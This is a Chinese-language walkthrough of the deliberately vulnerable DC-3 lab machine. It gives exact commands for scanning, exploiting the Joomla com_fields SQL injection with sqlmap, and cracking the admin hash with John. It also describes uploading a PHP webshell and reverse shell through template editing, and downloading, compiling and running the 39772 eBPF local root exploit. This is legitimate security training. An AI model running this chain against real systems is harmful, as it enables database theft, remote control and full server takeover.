DC-3 靶场复现学习及提权详细教程<\/h1>

环境搭建<\/h2>

工具准备<\/h3>
攻击机：Kali Linux (IP: 192.168.200.14)<\/li>
靶机：DC-3 (初始IP未知)<\/li> <\/ul>
网络配置<\/h3>
攻击机和靶机需使用相同网络连接模式<\/li>
推荐使用NAT模式(也可使用桥接模式)<\/li>
可通过查看靶机MAC地址确认目标主机<\/li> <\/ul>
信息收集阶段<\/h2>

1. 扫描存活主机<\/h3>
三种方法扫描同网段存活主机并识别靶机：<\/p>
arp-scan -l
<\/span><\/span>nmap -sP 192.168.200.0\/24 -T4
<\/span><\/span>natdiscover
<\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3>
扫描目标IP开放端口：<\/p>
nmap -sV -p- 192.168.200.8
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-sV<\/code>：扫描端口上运行的软件信息<\/li>
-p-<\/code>：扫描全部端口(0-65535)<\/li>
<\/ul>
结果分析：仅开放80端口<\/p>
3. 目录扫描<\/h3>
使用dirsearch工具扫描后台目录：<\/p>
dirsearch -u http:\/\/192.168.200.8\/
<\/span><\/span><\/code><\/pre>发现重要目录：\/administrator<\/code>（后台管理入口）<\/p>
4. 指纹识别<\/h3>

访问网站识别为Joomla CMS<\/li>
使用joomscan扫描：<\/li>
<\/ul>
joomscan -u http:\/\/192.168.200.8\/
<\/span><\/span><\/code><\/pre>安装joomscan：<\/p>
sudo apt-get install joomscan
<\/span><\/span><\/code><\/pre>漏洞利用阶段<\/h2>
1. SQL注入获取管理员凭证<\/h3>
使用SQLmap进行注入攻击：<\/p>

列出数据库：<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.200.8\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre>
列出joomladb数据库中的表：<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.200.8\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D "joomladb"<\/span> --tables -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre>发现#_users<\/code>表<\/p>

列出users表字段：<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.200.8\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D "joomladb"<\/span> -T "#__users"<\/span> --columns -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre>
爆出用户数据：<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.200.8\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --dbms mysql -D joomladb -T '#__users'<\/span> -C id,name,password,username --dump
<\/span><\/span><\/code><\/pre>获取到哈希值：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu<\/code><\/p>

使用John破解哈希：<\/li>
<\/ol>
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'<\/span> > admin.txt
<\/span><\/span>john admin.txt
<\/span><\/span><\/code><\/pre>破解结果：用户名为admin<\/code>，密码为snoopy<\/code><\/p>
2. 登录后台并上传Webshell<\/h3>

使用获取的凭证登录Joomla后台(\/administrator<\/code>)<\/li>
通过模板编辑功能上传Webshell：

在\/templates\/beez3\/<\/code>目录下创建test.php文件<\/li>
写入一句话木马<\/li>
<\/ul>
<\/li>
使用蚁剑连接Webshell<\/li>
<\/ol>
3. 反弹Shell<\/h3>

在\/templates\/beez3\/<\/code>目录上传反弹shell文件(shell.php)<\/li>
执行反弹shell获取交互式终端<\/li>
<\/ol>
提权阶段<\/h2>
1. 查找系统漏洞<\/h3>
使用searchsploit查找Ubuntu 16.04提权漏洞：<\/p>
searchsploit ubuntu 16.04
<\/span><\/span><\/code><\/pre>发现"拒绝服务漏洞"可用于提权(39772.txt)<\/p>
2. 下载并编译EXP<\/h3>

下载EXP（在靶机中操作）：<\/li>
<\/ol>
wget [<\/span>EXP下载链接]<\/span>
<\/span><\/span>unzip 39772.zip
<\/span><\/span>cd 39772<\/span>
<\/span><\/span>tar -xvf exploit.tar
<\/span><\/span>cd ebpf_mapfd_doubleput_exploit
<\/span><\/span><\/code><\/pre>
编译EXP：<\/li>
<\/ol>
.\/compile.sh
<\/span><\/span><\/code><\/pre>3. 执行提权<\/h3>
运行提权程序：<\/p>
.\/doubleput
<\/span><\/span><\/code><\/pre>等待片刻后获取root权限<\/p>
关键点总结<\/h2>

信息收集<\/strong>：通过MAC地址识别靶机、全面扫描端口和目录<\/li>
漏洞识别<\/strong>：利用Joomla已知漏洞进行SQL注入<\/li>
凭证获取<\/strong>：通过SQLmap提取并破解哈希<\/li>
权限维持<\/strong>：利用后台模板编辑功能上传Webshell<\/li>
提权路径<\/strong>：识别系统版本并利用合适的本地提权漏洞<\/li>
EXP使用<\/strong>：正确下载、编译和执行提权程序<\/li>
<\/ol>
注意事项<\/h2>

网络配置必须一致(NAT或桥接)<\/li>
SQLmap参数要完整(特别是risk和level)<\/li>
上传Webshell时注意路径可访问性<\/li>
提权EXP需要在靶机上下载和编译<\/li>
整个过程可能需要多次尝试，特别是破解哈希和提权阶段<\/li>
<\/ol>